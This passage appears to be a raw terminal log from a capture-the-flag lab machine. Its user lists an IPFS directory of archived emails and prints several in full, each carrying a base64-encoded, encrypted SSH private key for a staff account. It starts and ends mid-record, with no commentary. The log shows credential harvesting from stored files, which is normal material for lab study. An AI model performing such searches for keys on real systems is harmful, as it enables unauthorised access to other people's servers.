dFpCYXFTQzVmRzRXbk9mUUpsYkQKajBNWWRuUS9sMDRPcS9zZEc5YVJtbFBOZ2xMRC9tay9CRmdx
L2pQTVpudVkzU1NwUmV5aG1pN3hIQ0p1aHQ0NgprbTFjb3ZGWit6LzI5R0pET3JsUmxRZlJDWXBk
bTU2ZjVia0tlLzJPNGJpZ3hOcXg5STlsaXpBUGtQbTJaeWsxClRYWld3RTc4cFQxTnpPZVkxUTB1
QTc4QTlXL0NMOW1Id1QrMEcyOE10Y2kxZFZMZ1BNN0dGOVFCR3V2Y3Y1eDQKTlo3c0I3OWNvdEpk
WWQ1VkJGbENNbEZGM2RuVklCQ3BoMU1LRU9qTERlZjV1N0ttOWJmZTREOCs3bFJNOHdXeApsWTlG
aGVzMS9Sbm81Q3p4VTM4eUJCWk5SVXNUMEEyYzkvbTlYK29rMWdqMURiZ0tFM016OTdlZmhtcDll
UDcrCm9jS3NZOFdmLzZ2NTJrbjNEaXYvWTRHU3JBWDhwS0FFNmNSRzNtUHpSd25RMmtrM3h5VG1P
b0k5U3oraWVDUkQKSy9Ob1hBQjEwdU41aVY4OGFsWVNEUFNGRXJhQXNiNGxNK3owTzdmTXV4cWxK
dG5QRE9WSG9WRGI5SGM1RlhVbgpXL3loTEZLZkVTc2NlM29lZFA1NkNldndrVXkyK1k0bnh6UFQ3
SUkxWFpScTJ3VHBqQWxkVjVscDR0eExJRDFDCklabEdOY2NZenRuMnBqQTdxYWs2eG94ZUhLNnJO
akZqWEN6SEp1VzlKc1IyYmxmcWIrczcyNldhb0dCOEhpZFAKT3NDZHl5VlFORE1RV2pZY3k4UGNa
S2xNK3diQ1VtL1ZmMG9yM3ZCeVBQZEcxZWlQamIxSForZW5zMGtNZm05VApQVnZ5Ui9raWcxbzlJ
bFZKVll1eFNqaWVTcG9WN2VZM2pnejRaSjJ0R3llOUZ6eTVnRFFtdE9FdmJ6QXFNM2hGCmc2SWtT
US92bG1MSlV4M2F4b1FoWXNTNG91NWZYbk41MlZkbFBEemJqc0lyZWs5QTk3L3ZMTVAwM2lVYit3
RFoKVDlPQWEwamg0MmRHM1JNdmJRZStOTEZwMWVIMU81Y3JPZ0ZNU0s4SU5nN1RsRUhrbFhicFdn
PT0KLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0=
-----------------------f0b2a3c7251b9a231d99389237f1d80d--
administrator@chainsaw:/home$ 

@chainsaw:/home$ ipfs ls QmZrd1ik8Z2F5iSZPDA2cZSmaZkHFEE4jZ3MiQTDKHAiri
<s ls QmZrd1ik8Z2F5iSZPDA2cZSmaZkHFEE4jZ3MiQTDKHAiri
QmbwWcNc7TZBUDFzwW7eUTAyLE2hhwhHiTXqempi1CgUwB 10063 artichain600-protonmail-2018-12-13T20_50_58+01_00.eml
QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF 4640  bobbyaxelrod600-protonmail-2018-12-13-T20_28_54+01_00.eml
QmZxzK6gXioAUH9a68ojwkos8EaeANnicBJNA3TND4Sizp 10084 bryanconnerty600-protonmail-2018-12-13T20_50_36+01_00.eml
QmegE6RZe59xf1TyDdhhcNnMrsevsfuJHUynLuRc4yf6V1 10083 laraaxelrod600-protonmail-2018-12-13T20_49_35+01_00.eml
QmXwXzVYKgYZEXU1dgCKeejT87Knw9nydGcuUZrjwNb2Me 10092 wendyrhoades600-protonmail-2018-12-13T20_50_15+01_00.eml


administrator@chainsaw:/home$ ipfs cat QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF
< cat QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF
X-Pm-Origin: internal
X-Pm-Content-Encryption: end-to-end
Subject: Ubuntu Server Private RSA Key
From: IT Department <chainsaw_admin@protonmail.ch>
Date: Thu, 13 Dec 2018 19:28:54 +0000
Mime-Version: 1.0
Content-Type: multipart/mixed;boundary=---------------------d296272d7cb599bff2a1ddf6d6374d93
To: bobbyaxelrod600@protonmail.ch <bobbyaxelrod600@protonmail.ch>
X-Attached: bobby.key.enc
Message-Id: <zctvLwVo5mWy8NaBt3CLKmxVckb-cX7OCfxUYfHsU2af1NH4krcpgGz7h-PorsytjrT3sA9Ju8WNuWaRAnbE0CY0nIk2WmuwOvOnmRhHPoU=@protonmail.ch>
Received: from mail.protonmail.ch by mail.protonmail.ch; Thu, 13 Dec 2018 14:28:58 -0500
X-Original-To: bobbyaxelrod600@protonmail.ch
Return-Path: <chainsaw_admin@protonmail.ch>
Delivered-To: bobbyaxelrod600@protonmail.ch

-----------------------d296272d7cb599bff2a1ddf6d6374d93
Content-Type: multipart/related;boundary=---------------------ffced83f318ffbd54e80374f045d2451

-----------------------ffced83f318ffbd54e80374f045d2451
Content-Type: text/html;charset=utf-8
Content-Transfer-Encoding: base64

PGRpdj5Cb2JieSw8YnI+PC9kaXY+PGRpdj48YnI+PC9kaXY+PGRpdj5JIGFtIHdyaXRpbmcgdGhp
cyBlbWFpbCBpbiByZWZlcmVuY2UgdG8gdGhlIG1ldGhvZCBvbiBob3cgd2UgYWNjZXNzIG91ciBM
aW51eCBzZXJ2ZXIgZnJvbSBub3cgb24uIER1ZSB0byBzZWN1cml0eSByZWFzb25zLCB3ZSBoYXZl
IGRpc2FibGVkIFNTSCBwYXNzd29yZCBhdXRoZW50aWNhdGlvbiBhbmQgaW5zdGVhZCB3ZSB3aWxs
IHVzZSBwcml2YXRlL3B1YmxpYyBrZXkgcGFpcnMgdG8gc2VjdXJlbHkgYW5kIGNvbnZlbmllbnRs
eSBhY2Nlc3MgdGhlIG1hY2hpbmUuPGJyPjwvZGl2PjxkaXY+PGJyPjwvZGl2PjxkaXY+QXR0YWNo
ZWQgeW91IHdpbGwgZmluZCB5b3VyIHBlcnNvbmFsIGVuY3J5cHRlZCBwcml2YXRlIGtleS4gUGxl
YXNlIGFzayZuYnNwO3JlY2VwdGlvbiBkZXNrIGZvciB5b3VyIHBhc3N3b3JkLCB0aGVyZWZvcmUg
YmUgc3VyZSB0byBicmluZyB5b3VyIHZhbGlkIElEIGFzIGFsd2F5cy48YnI+PC9kaXY+PGRpdj48
YnI+PC9kaXY+PGRpdj5TaW5jZXJlbHksPGJyPjwvZGl2PjxkaXY+SVQgQWRtaW5pc3RyYXRpb24g
RGVwYXJ0bWVudDxicj48L2Rpdj4=
-----------------------ffced83f318ffbd54e80374f045d2451--
-----------------------d296272d7cb599bff2a1ddf6d6374d93
Content-Type: application/octet-stream; filename="bobby.key.enc"; name="bobby.key.enc"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bobby.key.enc"; name="bobby.key.enc"

LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQcm9jLVR5cGU6IDQsRU5DUllQVEVECkRF
Sy1JbmZvOiBERVMtRURFMy1DQkMsNTNEODgxRjI5OUJBODUwMwoKU2VDTll3L0JzWFB5UXExSFJM
RUVLaGlOSVZmdFphZ3pPY2M2NGZmMUlwSm85SWVHN1ovemordjFkQ0lkZWp1awo3a3RRRmN6VGx0
dG5ySWo2bWRCYjZybk42Q3NQMHZiejlOelJCeWcxbzZjU0dkckwyRW1KTi9lU3hENEFXTGN6Cm4z
MkZQWTBWamxJVnJoNHJqaFJlMndQTm9nQWNpQ0htWkdFQjB0Z3YyL2V5eEU2M1ZjUnpyeEpDWWwr
aHZTWjYKZnZzU1g4QTRRcjdyYmY5Zm56NFBJbUlndXJGM1ZoUW1kbEVtekRSVDRtL3BxZjNUbUdB
azkrd3JpcW5rT0RGUQpJKzJJMWNQYjhKUmhMU3ozcHlCM1gvdUdPVG5ZcDRhRXErQVFaMnZFSnoz
RmZYOVNYOWs3ZGQ2S2FadFNBenFpCnc5ODFFUzg1RGs5TlVvOHVMeG5aQXczc0Y3UHo0RXVKMEhw
bzFlWmdZdEt6dkRLcnJ3OHVvNFJDYWR4N0tIUlQKaW5LWGR1SHpuR0ExUVJPelpXN3hFM0hFTDN2
eFI5Z01WOGdKUkhEWkRNSTl4bHc5OVFWd2N4UGNGYTMxQXpWMgp5cDNxN3lsOTU0U0NNT3RpNFJD
M1o0eVVUakRrSGRIUW9FY0dpZUZPV1UraTFvaWo0Y3J4MUxiTzJMdDhuSEs2CkcxQ2NxN2lPb240
UnNUUmxWcnY4bGlJR3J4bmhPWTI5NWU5ZHJsN0JYUHBKcmJ3c284eHhIbFQzMzMzWVU5ZGoKaFFM
TnA1KzJINCtpNm1tVTN0Mm9nVG9QNHNrVmNvcURsQ0MrajZoRE9sNGJwRDl0NlRJSnVyV3htcEdn
TnhlcwpxOE5zQWVudGJzRCt4bDRXNnE1bXVMSlFtai94UXJySGFjRVpER0k4a1d2WkUxaUZtVmtE
L3hCUm53b0daNWh0CkR5aWxMUHBsOVIrRGg3YnkzbFBtOGtmOHRRbkhzcXBSSGNleUJGRnBucTBB
VWRFS2ttMUxSTUxBUFlJTGJsS0cKandyQ3FSdkJLUk1JbDZ0SmlEODdOTTZKQm9ReWRPRWNwbis2
RFUrMkFjdGVqYnVyMGFNNzRJeWVlbnJHS1NTWgpJWk1zZDJrVFNHVXh5OW8veFBLRGtVdy9TRlV5
U21td2lxaUZMNlBhRGd4V1F3SHh0eHZtSE1oTDZjaXROZEl3ClRjT1RTSmN6bVIycEp4a29oTHJI
N1lyUzJhbEtzTTBGcEZ3bWR6MS9YRFNGMkQ3aWJmL1cxbUF4TDVVbUVxTzAKaFVJdVcxZFJGd0hq
TnZhb1NrK2ZyQXA2aWM2SVBZU21kbzhHWVl5OHBYdmNxd2ZScHhZbEFDWnU0RmlpNmhZaQo0V3Bo
VDNaRllEcnc3U3RnSzA0a2JEN1FrUGVOcTlFdjFJbjJuVmR6RkhQSWg2eitmbXBiZ2ZXZ2VsTEhj
MmV0ClNKWTQrNUNFYmtBY1lFVW5QV1k5U1BPSjdxZVU3K2IvZXF6aEtia3BuYmxtaUsxZjNyZU9N
MllVS3k4YWFsZWgKbkpZbWttcjN0M3FHUnpoQUVUY2tjOEhMRTExZEdFK2w0YmE2V0JOdTE1R29F
V0Fzenp0TXVJVjFlbW50OTdvTQpJbW5mb250T1lkd0I2LzJvQ3V5SlRpZjhWdy9XdFdxWk5icGV5
OTcwNGE5bWFwLytiRHFlUVE0MStCOEFDRGJLCldvdnNneVdpL1VwaU1UNm02clgrRlA1RDVFOHpy
WXRubm1xSW83dnhIcXRCV1V4amFoQ2RuQnJrWUZ6bDZLV1IKZ0Z6eDNlVGF0bFpXeXI0a3N2Rm10
b2JZa1pWQVFQQUJXeitnSHB1S2xycWhDOUFOenIvSm4rNVpmRzAybW9GLwplZEwxYnA5SFBSSTQ3
RHl2THd6VDEvNUw5Wno2WSsxTXplbmRUaTNLcnpRL1ljZnI1WUFSdll5TUxiTGpNRXRQClV2SmlZ
NDB1Mm5tVmI2UXFwaXkyenIvYU1saHB1cFpQay94dDhvS2hLQytsOW1nT1RzQVhZakNiVG1MWHpW
clgKMTVVMjEwQmR4RUZVRGNpeE5pd1Rwb0JTNk1meENPWndOLzFadjBtRThFQ0krNDRMY3FWdDN3
PT0KLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0=
-----------------------d296272d7cb599bff2a1ddf6d6374d93--


administrator@chainsaw:/home$ ipfs cat QmZxzK6gXioAUH9a68ojwkos8EaeANnicBJNA3TND4Sizp
< cat QmZxzK6gXioAUH9a68ojwkos8EaeANnicBJNA3TND4Sizp
X-Pm-Origin: internal
X-Pm-Content-Encryption: end-to-end
Subject: Ubuntu Server Private RSA Key
From: IT Department <chainsaw_admin@protonmail.ch>
Date: Thu, 13 Dec 2018 19:50:36 +0000
Mime-Version: 1.0
Content-Type: multipart/mixed;boundary=---------------------777bea6c4f8367f1ba05d0b8d1801bd1
X-Attached: bryan.key.enc
To: bryanconnerty600@protonmail.ch <bryanconnerty600@protonmail.ch>
Message-Id: <iZGB8191yrvJZK2TjeoxnR-r793Y1KJiAS0DTEtvSkySWxEakKgBb7ExFtzJjFj3fDUu8hd9jmkgWLrb7UDrQG6FbC9hENoQD4GmJTbp4aI=@protonmail.ch>
Received: from mail.protonmail.ch by mail.protonmail.ch; Thu, 13 Dec 2018 14:50:44 -0500
X-Original-To: bryanconnerty600@protonmail.ch
Return-Path: <chainsaw_admin@protonmail.ch>
Delivered-To: bryanconnerty600@protonmail.ch

-----------------------777bea6c4f8367f1ba05d0b8d1801bd1
Content-Type: multipart/related;boundary=---------------------feac1e13283557e2447cc45f0aa88cf3

-----------------------feac1e13283557e2447cc45f0aa88cf3
Content-Type: text/html;charset=utf-8
Content-Transfer-Encoding: base64

PGRpdiBzdHlsZT0iY29sb3I6IHJnYig4NSwgODUsIDg1KTsgZm9udC1mYW1pbHk6IEFyaWFsLCAm
cXVvdDtIZWx2ZXRpY2EgTmV1ZSZxdW90OywgSGVsdmV0aWNhLCBzYW5zLXNlcmlmOyBmb250LXNp
emU6IDE0cHg7IGZvbnQtc3R5bGU6IG5vcm1hbDsgZm9udC12YXJpYW50LWxpZ2F0dXJlczogbm9y
bWFsOyBmb250LXZhcmlhbnQtY2Fwczogbm9ybWFsOyBmb250LXdlaWdodDogNDAwOyBsZXR0ZXIt
c3BhY2luZzogbm9ybWFsOyBvcnBoYW5zOiAyOyB0ZXh0LWFsaWduOiBzdGFydDsgdGV4dC1pbmRl
bnQ6IDBweDsgdGV4dC10cmFuc2Zvcm06IG5vbmU7IHdoaXRlLXNwYWNlOiBub3JtYWw7IHdpZG93
czogMjsgd29yZC1zcGFjaW5nOiAwcHg7IC13ZWJraXQtdGV4dC1zdHJva2Utd2lkdGg6IDBweDsg
dGV4dC1kZWNvcmF0aW9uLXN0eWxlOiBpbml0aWFsOyB0ZXh0LWRlY29yYXRpb24tY29sb3I6IGlu
aXRpYWw7IGJhY2tncm91bmQtY29sb3I6IHJnYigyNTUsIDI1NSwgMjU1KTsiPkJyeWFuLDxicj48
L2Rpdj48ZGl2IHN0eWxlPSJjb2xvcjogcmdiKDg1LCA4NSwgODUpOyBmb250LWZhbWlseTogQXJp
YWwsICZxdW90O0hlbHZldGljYSBOZXVlJnF1b3Q7LCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWY7IGZv
bnQtc2l6ZTogMTRweDsgZm9udC1zdHlsZTogbm9ybWFsOyBmb250LXZhcmlhbnQtbGlnYXR1cmVz
OiBub3JtYWw7IGZvbnQtdmFyaWFudC1jYXBzOiBub3JtYWw7IGZvbnQtd2VpZ2h0OiA0MDA7IGxl
dHRlci1zcGFjaW5nOiBub3JtYWw7IG9ycGhhbnM6IDI7IHRleHQtYWxpZ246IHN0YXJ0OyB0ZXh0
LWluZGVudDogMHB4OyB0ZXh0LXRyYW5zZm9ybTogbm9uZTsgd2hpdGUtc3BhY2U6IG5vcm1hbDsg
d2lkb3dzOiAyOyB3b3JkLXNwYWNpbmc6IDBweDsgLXdlYmtpdC10ZXh0LXN0cm9rZS13aWR0aDog
MHB4OyB0ZXh0LWRlY29yYXRpb24tc3R5bGU6IGluaXRpYWw7IHRleHQtZGVjb3JhdGlvbi1jb2xv
cjogaW5pdGlhbDsgYmFja2dyb3VuZC1jb2xvcjogcmdiKDI1NSwgMjU1LCAyNTUpOyI+PGJyPjwv
ZGl2PjxkaXYgc3R5bGU9ImNvbG9yOiByZ2IoODUsIDg1LCA4NSk7IGZvbnQtZmFtaWx5OiBBcmlh
bCwgJnF1b3Q7SGVsdmV0aWNhIE5ldWUmcXVvdDssIEhlbHZldGljYSwgc2Fucy1zZXJpZjsgZm9u
dC1zaXplOiAxNHB4OyBmb250LXN0eWxlOiBub3JtYWw7IGZvbnQtdmFyaWFudC1saWdhdHVyZXM6
IG5vcm1hbDsgZm9udC12YXJpYW50LWNhcHM6IG5vcm1hbDsgZm9udC13ZWlnaHQ6IDQwMDsgbGV0
dGVyLXNwYWNpbmc6IG5vcm1hbDsgb3JwaGFuczogMjsgdGV4dC1hbGlnbjogc3RhcnQ7IHRleHQt
aW5kZW50OiAwcHg7IHRleHQtdHJhbnNmb3JtOiBub25lOyB3aGl0ZS1zcGFjZTogbm9ybWFsOyB3
aWRvd3M6IDI7IHdvcmQtc3BhY2luZzogMHB4OyAtd2Via2l0LXRleHQtc3Ryb2tlLXdpZHRoOiAw
cHg7IHRleHQtZGVjb3JhdGlvbi1zdHlsZTogaW5pdGlhbDsgdGV4dC1kZWNvcmF0aW9uLWNvbG9y
OiBpbml0aWFsOyBiYWNrZ3JvdW5kLWNvbG9yOiByZ2IoMjU1LCAyNTUsIDI1NSk7Ij5JIGFtIHdy
aXRpbmcgdGhpcyBlbWFpbCBpbiByZWZlcmVuY2UgdG8gdGhlIG1ldGhvZCBvbiBob3cgd2UgYWNj
ZXNzIG91ciBMaW51eCBzZXJ2ZXIgZnJvbSBub3cgb24uIER1ZSB0byBzZWN1cml0eSByZWFzb25z
LCB3ZSBoYXZlIGRpc2FibGVkIFNTSCBwYXNzd29yZCBhdXRoZW50aWNhdGlvbiBhbmQgaW5zdGVh
ZCB3ZSB3aWxsIHVzZSBwcml2YXRlL3B1YmxpYyBrZXkgcGFpcnMgdG8gc2VjdXJlbHkgYW5kIGNv
bnZlbmllbnRseSBhY2Nlc3MgdGhlIG1hY2hpbmUuPGJyPjwvZGl2PjxkaXYgc3R5bGU9ImNvbG9y
OiByZ2IoODUsIDg1LCA4NSk7IGZvbnQtZmFtaWx5OiBBcmlhbCwgJnF1b3Q7SGVsdmV0aWNhIE5l
dWUmcXVvdDssIEhlbHZldGljYSwgc2Fucy1zZXJpZjsgZm9udC1zaXplOiAxNHB4OyBmb250LXN0
eWxlOiBub3JtYWw7IGZvbnQtdmFyaWFudC1saWdhdHVyZXM6IG5vcm1hbDsgZm9udC12YXJpYW50
LWNhcHM6IG5vcm1hbDsgZm9udC13ZWlnaHQ6IDQwMDsgbGV0dGVyLXNwYWNpbmc6IG5vcm1hbDsg
b3JwaGFuczogMjsgdGV4dC1hbGlnbjogc3RhcnQ7IHRleHQtaW5kZW50OiAwcHg7IHRleHQtdHJh
bnNmb3JtOiBub25lOyB3aGl0ZS1zcGFjZTogbm9ybWFsOyB3aWRvd3M6IDI7IHdvcmQtc3BhY2lu
ZzogMHB4OyAtd2Via2l0LXRleHQtc3Ryb2tlLXdpZHRoOiAwcHg7IHRleHQtZGVjb3JhdGlvbi1z
dHlsZTogaW5pdGlhbDsgdGV4dC1kZWNvcmF0aW9uLWNvbG9yOiBpbml0aWFsOyBiYWNrZ3JvdW5k
LWNvbG9yOiByZ2IoMjU1LCAyNTUsIDI1NSk7Ij48YnI+PC9kaXY+PGRpdiBzdHlsZT0iY29sb3I6
IHJnYig4NSwgODUsIDg1KTsgZm9udC1mYW1pbHk6IEFyaWFsLCAmcXVvdDtIZWx2ZXRpY2EgTmV1
ZSZxdW90OywgSGVsdmV0aWNhLCBzYW5zLXNlcmlmOyBmb250LXNpemU6IDE0cHg7IGZvbnQtc3R5
bGU6IG5vcm1hbDsgZm9udC12YXJpYW50LWxpZ2F0dXJlczogbm9ybWFsOyBmb250LXZhcmlhbnQt
Y2Fwczogbm9ybWFsOyBmb250LXdlaWdodDogNDAwOyBsZXR0ZXItc3BhY2luZzogbm9ybWFsOyBv
cnBoYW5zOiAyOyB0ZXh0LWFsaWduOiBzdGFydDsgdGV4dC1pbmRlbnQ6IDBweDsgdGV4dC10cmFu
c2Zvcm06IG5vbmU7IHdoaXRlLXNwYWNlOiBub3JtYWw7IHdpZG93czogMjsgd29yZC1zcGFjaW5n
OiAwcHg7IC13ZWJraXQtdGV4dC1zdHJva2Utd2lkdGg6IDBweDsgdGV4dC1kZWNvcmF0aW9uLXN0
eWxlOiBpbml0aWFsOyB0ZXh0LWRlY29yYXRpb24tY29sb3I6IGluaXRpYWw7IGJhY2tncm91bmQt
Y29sb3I6IHJnYigyNTUsIDI1NSwgMjU1KTsiPkF0dGFjaGVkIHlvdSB3aWxsIGZpbmQgeW91ciBw
ZXJzb25hbCBlbmNyeXB0ZWQgcHJpdmF0ZSBrZXkuIFBsZWFzZSBhc2smbmJzcDtyZWNlcHRpb24g
ZGVzayBmb3IgeW91ciBwYXNzd29yZCwgdGhlcmVmb3JlIGJlIHN1cmUgdG8gYnJpbmcgeW91ciB2
YWxpZCBJRCBhcyBhbHdheXMuPGJyPjwvZGl2PjxkaXYgc3R5bGU9ImNvbG9yOiByZ2IoODUsIDg1
LCA4NSk7IGZvbnQtZmFtaWx5OiBBcmlhbCwgJnF1b3Q7SGVsdmV0aWNhIE5ldWUmcXVvdDssIEhl
bHZldGljYSwgc2Fucy1zZXJpZjsgZm9udC1zaXplOiAxNHB4OyBmb250LXN0eWxlOiBub3JtYWw7
IGZvbnQtdmFyaWFudC1saWdhdHVyZXM6IG5vcm1hbDsgZm9udC12YXJpYW50LWNhcHM6IG5vcm1h
bDsgZm9udC13ZWlnaHQ6IDQwMDsgbGV0dGVyLXNwYWNpbmc6IG5vcm1hbDsgb3JwaGFuczogMjsg
dGV4dC1hbGlnbjogc3RhcnQ7IHRleHQtaW5kZW50OiAwcHg7IHRleHQtdHJhbnNmb3JtOiBub25l
OyB3aGl0ZS1zcGFjZTogbm9ybWFsOyB3aWRvd3M6IDI7IHdvcmQtc3BhY2luZzogMHB4OyAtd2Vi
a2l0LXRleHQtc3Ryb2tlLXdpZHRoOiAwcHg7IHRleHQtZGVjb3JhdGlvbi1zdHlsZTogaW5pdGlh
bDsgdGV4dC1kZWNvcmF0aW9uLWNvbG9yOiBpbml0aWFsOyBiYWNrZ3JvdW5kLWNvbG9yOiByZ2Io
MjU1LCAyNTUsIDI1NSk7Ij48YnI+PC9kaXY+PGRpdiBzdHlsZT0iY29sb3I6IHJnYig4NSwgODUs
IDg1KTsgZm9udC1mYW1pbHk6IEFyaWFsLCAmcXVvdDtIZWx2ZXRpY2EgTmV1ZSZxdW90OywgSGVs
dmV0aWNhLCBzYW5zLXNlcmlmOyBmb250LXNpemU6IDE0cHg7IGZvbnQtc3R5bGU6IG5vcm1hbDsg
Zm9udC12YXJpYW50LWxpZ2F0dXJlczogbm9ybWFsOyBmb250LXZhcmlhbnQtY2Fwczogbm9ybWFs
OyBmb250LXdlaWdodDogNDAwOyBsZXR0ZXItc3BhY2luZzogbm9ybWFsOyBvcnBoYW5zOiAyOyB0
ZXh0LWFsaWduOiBzdGFydDsgdGV4dC1pbmRlbnQ6IDBweDsgdGV4dC10cmFuc2Zvcm06IG5vbmU7
IHdoaXRlLXNwYWNlOiBub3JtYWw7IHdpZG93czogMjsgd29yZC1zcGFjaW5nOiAwcHg7IC13ZWJr
aXQtdGV4dC1zdHJva2Utd2lkdGg6IDBweDsgdGV4dC1kZWNvcmF0aW9uLXN0eWxlOiBpbml0aWFs
OyB0ZXh0LWRlY29yYXRpb24tY29sb3I6IGluaXRpYWw7IGJhY2tncm91bmQtY29sb3I6IHJnYigy
NTUsIDI1NSwgMjU1KTsiPlNpbmNlcmVseSw8YnI+PC9kaXY+PGRpdiBzdHlsZT0iY29sb3I6IHJn
Yig4NSwgODUsIDg1KTsgZm9udC1mYW1pbHk6IEFyaWFsLCAmcXVvdDtIZWx2ZXRpY2EgTmV1ZSZx
dW90OywgSGVsdmV0aWNhLCBzYW5zLXNlcmlmOyBmb250LXNpemU6IDE0cHg7IGZvbnQtc3R5bGU6
IG5vcm1hbDsgZm9udC12YXJpYW50LWxpZ2F0dXJlczogbm9ybWFsOyBmb250LXZhcmlhbnQtY2Fw
czogbm9ybWFsOyBmb250LXdlaWdodDogNDAwOyBsZXR0ZXItc3BhY2luZzogbm9ybWFsOyBvcnBo
YW5zOiAyOyB0ZXh0LWFsaWduOiBzdGFydDsgdGV4dC1pbmRlbnQ6IDBweDsgdGV4dC10cmFuc2Zv
cm06IG5vbmU7IHdoaXRlLXNwYWNlOiBub3JtYWw7IHdpZG93czogMjsgd29yZC1zcGFjaW5nOiAw
cHg7IC13ZWJraXQtdGV4dC1zdHJva2Utd2lkdGg6IDBweDsgdGV4dC1kZWNvcmF0aW9uLXN0eWxl
OiBpbml0aWFsOyB0ZXh0LWRlY29yYXRpb24tY29sb3I6IGluaXRpYWw7IGJhY2tncm91bmQtY29s
b3I6IHJnYigyNTUsIDI1NSwgMjU1KTsiPklUIEFkbWluaXN0cmF0aW9uIERlcGFydG1lbnQ8YnI+
PC9kaXY+
-----------------------feac1e13283557e2447cc45f0aa88cf3--
-----------------------777bea6c4f8367f1ba05d0b8d1801bd1
Content-Type: application/octet-stream; filename="bryan.key.enc"; name="bryan.key.enc"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bryan.key.enc"; name="bryan.key.enc"

LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQcm9jLVR5cGU6IDQsRU5DUllQVEVECkRF
Sy1JbmZvOiBERVMtRURFMy1DQkMsQ0Y3OUM3RUUzNUVDN0Q4NQoKQUhwTkE4dkdtYm5OekprRkE2
b1ZpVVZYZHJwM2c3OVJ3TE1wVmJZSlZFMHBFTmF1a0QyeGtlWjlvRURvZXk5dAo3QWk5dVRCN0pS
Q1RLRVl2RmoxYXZsbXphbTVOVzFLNnRxN1BUdEFmbU5mSjF2ZUFhZXlzaWE1cVJOWGJuOEJrClcv
R0RsQUtBNU0yS2hSYW5XSmVTcEl0d0VFTHdCNllHOFpUd3p1NEV2WWE1R3ZjVXhDUjZ0UXZyL2lo
dHhVTkoKdmtPK3F1RkNZM1I1bHlJd0V6dVVJcE9KQ1FqSktkKzROak5ETHpHMTZ1WEVqMThVbGsy
RDE1bWJNN1hlalBEZApFYzl5VTRSY0ZZS1A4WUU4M3hJOEY1bnNHQjc0ZEhzbkdpVEM1Kyt2bWI4
ZlpoaXJWS3p4b0JwSE1WWDNUNFc3CmFKUU8rRklKVlRIUHB3NnEwZUFEQXNzR1drb01xU1lzb0ht
d044bERzc3BQUjV4ODlNaTBwcGtWYndYSnBQNkMKaURLOTAzbUVKWDV3RmMyRG9yV29seXJKM1hY
ZEoxQkRzK1V0NGI0cmNpRE85S3JoaHI3UU83ZDRFMTZsc2dpdgowR3JpRE5CWEhXTVVIZFhOYXFW
Z3VmbXZQNnJ6cFBqamNkcmQ1SEdGakZOR1g2UHFhaGpRU2VIOC93c0lraEU5CjA2VTB5dnA4cXlN
SHZRT1lUYy9jaVRKKzU0U2h6VUd4OXhlVWhtKzExQldqNVJCUGF4WGlVbXA5dnVmeUFHN0EKaGg4
NFJUbE9SOFRNVlQrSUh2aWRJbTFCT29QL3dRSTRBWmVtT2RyVExsbklENnpyYThjM2U1MGNaYS9Q
dTZGZgpZaUhHRlFYOTVaNXBUR3VjaUM3ekdVdkY5STEyVllMU2ZmOWdVRWhwQTJGMzlmTmhyYXNM
ZUdVT1NiV3ZUUVhQCm5OZHdQMFFEMnZjOUVOVlRXc1JCUkM2U2JJSjcwa0NUVFVHdFpZK2dydC9U
Q21oZXpUNDVwc2drYmhwTFdNWm8KbWxDc3ZGWjdtL053eHN0Umxvcjk3OWxubmUwK1JJRkhVclEy
NUMvZXgwanBZOGMySmh1WlQ1Y01CQ1BGYXhGZQpTUlZ6MDd0YTFzeWI2RGhydzNQZlVPclFQaWxO
L3RnZmloakVvNldHLzNyRlNSSGkrK0FRR1BzZE9IcmxDR211CjZ0QXBHWmJsa2d2bFNvNldmclp5
QytnZHlTNkdPdnJ0UXhRS1VvWGg4VXVYc0RWL1JLbFpIR1FhVGUrcldFeDkKZ3lHcTJmMzNmNnRE
Z0hkM0k0MktHRU5wUXVpWEpya3hWNDRsYVJLK0w1SHNVSjg2ajdVSGFZMGNXNFBtRTcwawpHdmhs
Vi84SkQwYUlmd1B1WGdUc1k4bXEvZXMvdXM1R1I5SWRyM24yZzRWMzNUQmJ4MGt3ODJIdGswWno4
MVRZCitpSlZ1ZHUrcEM4VWlmMERvYzVRTU1IOWcvc1h2THA2b0JpbWF6bnp1RVcrUkpCOTl0eUV0
MmZNVlpRaFFiWEgKYmRjWitQQUJSaWs2VmlrWnhqWDRVTjBFdXlVc2JvSThSbmNJWlVnQjFIRjd4
WkgwR3JQK2o4YmFOK1RsVEtodwpXVVZMQnhDSTI0R3dyVytjWmdRRkttVDRsWWZtM1JscXowcnV6
Y2pST21hUFZzWjZOS1NzYUo5Y0x6cXNRa3JiCmJRYXI5MjY4cThJVVRtcVNZM01JRElUOG5iaHl1
d3lUanA4RWpPOExRK1JuZ2ZOUFk2dnY4QmV0ZFM0L0tqT3UKR2ZFc0RjYTc2NXh4QnhKMWNVcGpR
d01xREVSZ2dhMWJYNmNQRTN4Zk5nQ20yQXVvbGJXWEE4alVCVGRPUXZUYQpoSTVWZFZKWVhSQmho
WHU0dWpkRmNJRGlpcURMTnNTUFFDZ0RnWThpZTlvb0FyenU5dys4RmRYcjRpSDFjTlY5CnN4Z1FH
Z3JHcVNjaDBaeHpQaDJzbFIwUkREL0ZscStJV2N0OFFJd2RyOElRa3JCaDYrdGtZbCtEWEFuQVhJ
NFkKVnk2UEdCdUg4d05BcnhKR1hjdXRabTM1ajcrVnYxd1B5Z1I5NTV4RzZGN2pPVkhLK25FOWFB
PT0KLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0=
-----------------------777bea6c4f8367f1ba05d0b8d1801bd1--
administrator@chainsaw:/home$ 

administrator@chainsaw:/home$ ipfs cat QmegE6RZe59xf1TyDdhhcNnMrsevsfuJHUynLuRc4yf6V1
< cat QmegE6RZe59xf1TyDdhhcNnMrsevsfuJHUynLuRc4yf6V1
X-Pm-Origin: internal
X-Pm-Content-Encryption: end-to-end
Subject: Ubuntu Server Private RSA Key
From: IT Department <chainsaw_admin@protonmail.ch>
